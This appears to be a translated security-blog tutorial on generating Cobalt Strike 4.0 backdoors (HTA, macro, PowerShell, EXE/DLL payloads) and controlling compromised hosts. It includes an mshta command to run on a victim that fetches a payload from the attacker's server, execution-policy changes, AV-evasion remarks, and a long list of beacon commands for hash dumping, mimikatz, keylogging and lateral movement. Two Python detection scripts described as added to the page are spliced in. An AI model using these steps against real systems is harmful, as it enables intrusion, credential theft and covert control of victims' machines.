
Several ways to generate backdoor in cobalstrike 4.0 and basic operation after the host goes online

2021-01-28 14:56:32 Ms08067 safety laboratory

Steps: Attacks -> Packages, with the following options:

HTML Application: generates a malicious HTA trojan file;

MS Office Macro: generates an Office macro virus file;

Payload Generator: generates payloads in various forms;

Windows Executable: generates an executable (exe) trojan;

Windows Executable (S): generates a stageless executable (exe) trojan.

1、HTML Application

Generates a malicious HTA trojan file

An HTML Application (HTA) is a Windows program written in HTML and an Internet Explorer-supported scripting language. This package generates an HTML application that runs a Cobalt Strike payload. Choose the executable option to get an HTML application that drops an executable on disk and runs it.

Choose the PowerShell option to get an HTML application that uses PowerShell to run a payload. Use the VBA option to silently spawn a Microsoft Excel instance and run a malicious macro that injects a payload into memory.

Generating an HTML application

Attacks -> Packages -> HTML Application

There are three working modes:

executable (generates an executable attack script)

powershell (generates a powershell script)

VBA (generates a vba script, executed with the mshta command)

Here is the way that got a host online: generate the powershell one, because the other two ways did not succeed for me, and then use it together with a hosted file.

It then generates a URL; copy it:

http://x.x.x.x:8008/download/file.ext

Then run it on the victim's machine:

mshta http://x.x.x.x:8008/download/file.ext

CS then receives the host online.

2、MS Office Macro

This package generates a Microsoft Office macro file and provides instructions for embedding the macro in Microsoft Word or Microsoft Excel. For making the macro file, refer to the phishing part of my article.

3、Payload Generator

This package lets you export Cobalt Strike's stager in many different formats.

Operation: Attacks -> Packages -> Payload Generator

This module can generate backdoor payloads in many languages, including C, C#, Python, Java, Perl, PowerShell script, PowerShell command, Ruby, Raw, shellcode for the Veil AV-evasion framework, and so on.

When penetrating Windows hosts, what we use most is PowerShell and PowerShell Command, mainly because they are convenient and easy to use and can evade anti-virus (AV) detection.

Take PowerShell Command as an example: the generated payload is a string of commands. Just execute the command on the host (the host must have PowerShell installed) and CS receives a beacon from the host.

4、Windows Executable (Windows executable file)

This package generates a Windows executable artifact that delivers a payload stager. It gives you several output options.

Windows Service EXE is a Windows executable that responds to Service Control Manager commands. You can use this executable to create a Windows service with the sc command, or as a custom executable for the Metasploit Framework's PsExec module.

In other words, the difference between an ordinary EXE and a service-started EXE is this: an EXE generated with Windows Service EXE can be used as a self-starting service EXE, while an EXE generated with Cobalt Strike's Windows EXE cannot be used as a self-starting service program (because it cannot respond to the Service Control Manager).

Windows DLL (32-bit) is an x86 Windows DLL.

Windows DLL (64-bit) is an x64 Windows DLL. This DLL spawns a 32-bit process and migrates your listener into it. Both DLL options export a start function that is compatible with rundll32.exe; use rundll32.exe to load your DLL. Check the Use x64 payload box to generate an x64 artifact that pairs with an x64 stager. Check the Sign executable file box to sign an EXE or DLL artifact with a code-signing certificate. You must specify a certificate, and you must specify it in the C2 extension file.

A lot is said above, but in practice it is simple: just confirm whether the victim's computer is x64 or x86 and run the generated exe file.
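The two delivery paths described on this page, mshta fetching a remote URL (the HTA section) and rundll32.exe loading a DLL (the Windows DLL options), both leave a process-creation record that a defender can match on. The following is an added example, not code from the page or from Cobalt Strike: it scans constructed process-creation log lines (a pipe-separated "time|host|image|command line" layout assumed for illustration) and flags mshta.exe launched with a remote URL and rundll32.exe loading a DLL from outside the Windows directory.

```python
"""Flag process-creation records where mshta.exe fetches a remote URL or
rundll32.exe loads a DLL from outside the Windows directory.

Added example for this page; not Cobalt Strike code. The record layout
("time|host|image|command line") and the sample lines are constructed.
"""
import re
from typing import Dict, List

# Constructed sample process-creation log lines (not captured from a real host).
SAMPLE_LOG = """\
2021-01-28T14:56:00|WS01|C:\\Windows\\System32\\mshta.exe|mshta http://x.x.x.x:8008/download/file.ext
2021-01-28T14:56:05|WS01|C:\\Windows\\System32\\rundll32.exe|rundll32.exe C:\\Users\\alice\\AppData\\Local\\Temp\\artifact.dll,Start
2021-01-28T14:57:10|WS02|C:\\Windows\\System32\\rundll32.exe|rundll32.exe C:\\Windows\\System32\\shell32.dll,Control_RunDLL
2021-01-28T14:58:00|WS02|C:\\Windows\\System32\\mshta.exe|mshta C:\\Program Files\\Vendor\\setup.hta
2021-01-28T14:59:00|WS03|C:\\Windows\\System32\\notepad.exe|notepad.exe report.txt
"""

# A URL scheme anywhere in the command line means the HTA is fetched remotely.
REMOTE_URL = re.compile(r"\b(?:https?|ftp)://", re.IGNORECASE)
# rundll32 takes "<dll path>,<export>"; capture the path part (optionally quoted).
RUNDLL32_ARG = re.compile(r'rundll32(?:\.exe)?\s+"?([^",]+)', re.IGNORECASE)
# DLLs shipped with the OS live under <drive>:\Windows\.
WINDOWS_DIR = re.compile(r"^[a-z]:\\windows\\", re.IGNORECASE)


def parse_line(line: str) -> Dict[str, str]:
    """Split one pipe-separated record into its four fields."""
    time, host, image, cmdline = line.rstrip("\n").split("|", 3)
    return {"time": time, "host": host, "image": image, "cmdline": cmdline}


def classify(rec: Dict[str, str]) -> str:
    """Return a finding label for one record, or '' when nothing matches."""
    image = rec["image"].lower()
    cmd = rec["cmdline"]
    if image.endswith("\\mshta.exe") and REMOTE_URL.search(cmd):
        return "mshta-remote-url"
    if image.endswith("\\rundll32.exe"):
        m = RUNDLL32_ARG.search(cmd)
        if m and not WINDOWS_DIR.match(m.group(1).strip()):
            return "rundll32-non-system-dll"
    return ""


def scan(log_text: str) -> List[Dict[str, str]]:
    """Return every record that produced a finding, with the label attached."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        label = classify(rec)
        if label:
            rec["finding"] = label
            findings.append(rec)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['time']} {f['host']} {f['finding']}: {f['cmdline']}")
```

On the constructed sample the scan returns two findings: the mshta line carrying the page's download URL and the rundll32 line loading a DLL from a user's Temp directory; the mshta run of a local .hta and the rundll32 call into shell32.dll are left alone. Real telemetry (Sysmon event 1 or Windows 4688) needs the field mapping adjusted, but the two predicates carry over unchanged.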

5、Windows Executable (S)

This package exports Beacon directly (that is, the payload stage). This Beacon is a 32- or 64-bit DLL written by the author; it is an executable that does not use a stager, and it connects directly to the listener to transmit data and commands. A payload artifact that does not use a stager is called a stageless artifact. This package also has a PowerShell option to export Beacon as a PowerShell script, and a raw option to export position-independent Beacon code.

By default, this dialog exports the x86 payload stage. Check the Use x64 payload box to generate an x64 stage with x64 artifacts. Check the Sign executable file box to sign an EXE or DLL artifact with a code-signing certificate.

Here we try to generate a PowerShell trojan.

But running it directly after generation does not work.

So we change its execution policy.

Only administrators have permission to change this policy; non-administrators get an error. To view the script execution policy:

PS E:\> Get-ExecutionPolicy

To change the script execution policy:

PS E:\> Get-ExecutionPolicy
Restricted
PS E:\> Set-ExecutionPolicy UnRestricted

Then execute it again.

Operations after the machine comes online in CS 4.0

Right-click menu:

1、Interact

Enter commands to operate the host.

2、Access

Dump Hashes # Dump hashes

Elevate # Privilege escalation

Golden Ticket # Generate a golden ticket and inject it into the current session

Make token # Create a token from credentials

Run Mimikatz # Run Mimikatz

Spawn As # Spawn a Cobalt Strike session as another user

3、Explore

Browser Pivot # Hijack the target's browser process

Desktop (VNC) # Desktop interaction

File Browser # File browser

Net View # The net view command

Port Scan # Port scan

Process List # Process list

Screenshot # Screenshot

4、Pivoting

SOCKS Server # Proxy service

Listener # Reverse port forwarding

Deploy VPN # Deploy a VPN

5、Spawn

External listeners (hand the session off to MSF to obtain meterpreter access)

6、Session

Note # Remark

Color # Mark with a color

Remove # Delete

Sleep # Set the sleep time of the controlled host. The default is 60 seconds; setting 10 makes the controlled host fetch a task every 10 seconds. In practice, do not make the frequency too fast, because it is easy to discover (this is the heartbeat time).

Exit # Exit
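The Sleep item above says a fast, fixed heartbeat is "easy to discover"; the reason is that a constant sleep produces requests to the same destination at nearly identical spacing, which stands out against ordinary browsing. The following is an added example, not code from the page or from Cobalt Strike: it groups constructed web proxy log lines (an "epoch client destination path" layout assumed for illustration) by client and destination and flags pairs whose inter-request gaps barely vary.

```python
"""Spot beacon-like periodic callbacks in web proxy logs.

Added example for this page; not Cobalt Strike code. The log layout
("epoch client destination path") and the sample lines are constructed.
"""
from collections import defaultdict
from statistics import mean, pstdev
from typing import Dict, List, Tuple

# Constructed sample proxy log lines (not captured from a real proxy).
# 10.0.0.5 calls back every 60 seconds; 10.0.0.7 is ordinary browsing.
SAMPLE_LOG = """\
1611845700 10.0.0.5 x.x.x.x:8008 /download/file.ext
1611845760 10.0.0.5 x.x.x.x:8008 /updates
1611845820 10.0.0.5 x.x.x.x:8008 /updates
1611845880 10.0.0.5 x.x.x.x:8008 /updates
1611845940 10.0.0.5 x.x.x.x:8008 /updates
1611846000 10.0.0.5 x.x.x.x:8008 /updates
1611845710 10.0.0.7 example.org /index.html
1611845733 10.0.0.7 example.org /news
1611845901 10.0.0.7 example.org /about
1611846250 10.0.0.7 example.org /index.html
1611846310 10.0.0.7 example.org /contact
"""

Key = Tuple[str, str]  # (client, destination)


def parse(log_text: str) -> Dict[Key, List[int]]:
    """Group request timestamps by (client, destination), sorted ascending."""
    times: Dict[Key, List[int]] = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        epoch, client, dest, _path = line.split(maxsplit=3)
        times[(client, dest)].append(int(epoch))
    for seq in times.values():
        seq.sort()
    return times


def intervals(seq: List[int]) -> List[int]:
    """Gaps in seconds between consecutive requests."""
    return [b - a for a, b in zip(seq, seq[1:])]


def score(seq: List[int]) -> Tuple[float, float]:
    """Return (mean gap, coefficient of variation); a CV near 0 means a fixed rhythm."""
    gaps = intervals(seq)
    m = mean(gaps)
    return m, (pstdev(gaps) / m if m else float("inf"))


def find_beacons(log_text: str, min_requests: int = 5, max_cv: float = 0.2) -> List[dict]:
    """Pairs with at least min_requests requests whose gaps vary by no more than max_cv."""
    hits = []
    for (client, dest), seq in parse(log_text).items():
        if len(seq) < min_requests:
            continue
        m, cv = score(seq)
        if cv <= max_cv:
            hits.append({"client": client, "dest": dest, "count": len(seq),
                         "mean_gap_s": m, "cv": cv})
    return hits


if __name__ == "__main__":
    for h in find_beacons(SAMPLE_LOG):
        print(f"{h['client']} -> {h['dest']}: {h['count']} requests, "
              f"every {h['mean_gap_s']:.0f}s, cv={h['cv']:.2f}")
```

On the sample the only hit is 10.0.0.5 -> x.x.x.x:8008 (mean gap 60 s, cv 0), while 10.0.0.7's visits to example.org have a cv above 0.8 and are ignored. The thresholds are starting points: a shorter sleep gives more samples per hour and therefore a faster, more confident match, which is the practical meaning of "not too fast".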

Operations available after opening a beacon with interact:

1. argue # Spoof process arguments

2. blockdlls # Block child processes from loading non-Microsoft DLLs

3. browserpivot # Inject into the victim's browser process

4. bypassuac # Bypass UAC to elevate privileges

5. cancel # Cancel a download in progress

6. cd # Change directory

7. checkin # Force the controlled host to check in once

8. clear # Clear the beacon's task queue

9. connect # Connect to a Beacon peer over TCP

10. covertvpn # Deploy a Covert VPN client

11. cp # Copy a file

12. dcsync # Extract password hashes from a DC

13. desktop # Remote desktop (VNC)

14. dllinject # Reflectively inject a DLL into a process

15. dllload # Load a DLL into a process with LoadLibrary

16. download # Download a file

17. downloads # List file downloads in progress

18. drives # List the target's drive letters

19. elevate # Use an exploit to elevate privileges

20. execute # Run a program on the target (no output)

21. execute-assembly # Run a local .NET program in memory on the target

22. exit # Terminate the beacon session

23. getprivs # Enable system privileges on the current token

24. getsystem # Attempt to get SYSTEM privileges

25. getuid # Get the user ID

26. hashdump # Dump password hashes

27. help # Help

28. inject # Spawn a session in an injected process

29. jobkill # Kill a background job

30. jobs # List background jobs

31. kerberos_ccache_use # Import a ticket from a ccache file and apply it to this session

32. kerberos_ticket_purge # Purge the tickets for the current session

33. kerberos_ticket_use # Import a ticket from a ticket file and apply it to this session

34. keylogger # Keystroke logger

35. kill # Kill a process

36. link # Connect to a Beacon peer over a named pipe

37. logonpasswords # Dump credentials and hashes with mimikatz

38. ls # List files

39. make_token # Create a token to pass credentials

40. mimikatz # Run mimikatz

41. mkdir # Create a directory

42. mode dns # Use DNS A records as the communication channel (DNS beacon only)

43. mode dns-txt # Use DNS TXT records as the communication channel (DNS beacon only)

44. mode dns6 # Use DNS AAAA records as the communication channel (DNS beacon only)

45. mode http # Use HTTP as the communication channel

46. mv # Move a file

47. net # net commands

48. note # Remark

49. portscan # Run a port scan

50. powerpick # Execute a command via Unmanaged PowerShell

51. powershell # Execute a command via powershell.exe

52. powershell-import # Import a PowerShell script

53. ppid # Set the parent PID for spawned post-ex jobs

54. ps # Show the process list

55. psexec # Use a service to spawn a session on a host

56. psexec_psh # Use PowerShell to spawn a session on a host

57. psinject # Execute PowerShell commands in a specific process

58. pth # Pass-the-hash with Mimikatz

59. pwd # Current directory

60. reg # Query the registry

61. rev2self # Revert to the original token

62. rm # Delete a file or folder

63. rportfwd # Reverse port forward

64. run # Run a program on the target (returns output)

65. runas # Run a program as another user

66. runasadmin # Run a program with elevated privileges

67. runu # Execute a program under another PID

68. screenshot # Take a screenshot

69. setenv # Set an environment variable

70. shell # Execute a cmd command

71. shinject # Inject shellcode into a process

72. shspawn # Spawn a process and inject shellcode into it

73. sleep # Set the sleep delay

74. socks # Start a SOCKS4 proxy

75. socks stop # Stop SOCKS

76. spawn # Spawn a session

77. spawnas # Spawn a session as another user

78. spawnto # Set the executable to spawn processes into

79. spawnu # Spawn a session under another PID

80. ssh # Connect to a remote host with ssh

81. ssh-key # Connect to a remote host with an ssh key

82. steal_token # Steal a token from a process

83. timestomp # Apply one file's timestamps to another file

84. unlink # Disconnect from the parent Beacon

85. upload # Upload a file

86. wdigest # Dump plaintext credentials with mimikatz

87. winrm # Lateral movement with WinRM

88. wmi # Lateral movement with WMI

This article is from the WeChat official account Ms08067 Safety Laboratory (Ms08067_com).

Original publication time: 2021-01-22

Copyright notice
This article was written by Ms08067 safety laboratory; please include the original link when reprinting, thanks.
https://chowdera.com/2021/01/20210128144227707t.html